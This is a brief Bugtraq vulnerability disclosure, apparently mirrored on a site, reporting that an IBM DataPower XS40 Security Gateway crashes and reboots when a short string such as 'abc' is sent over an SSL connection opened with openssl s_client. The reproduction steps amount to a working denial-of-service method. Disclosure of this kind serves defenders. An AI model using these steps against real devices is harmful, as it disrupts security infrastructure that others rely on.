[IBM Datapower XS40] Denial of Service

From: erik@psafe.nl
To: bugtraq@securityfocus.com
Subject: [IBM Datapower XS40] Denial of Service

It appears it is possible to crash the IBM DataPower XS40 Security Gateway device by sending a simple (random?) string to it, over an established SSL-connection. The device reboots as a response to the input.

Tested vulnerable firmware is
Issue fixed as tested in

Tested as follows (entered attack-string is abc in this case):
openssl s_client -connect [IP]:[port]
Loading 'screen' into random state - done
abc [enter][enter]


After this, the device crashes and reboots

Copyright © 1995-2019 LinuxRocket.net. All rights reserved.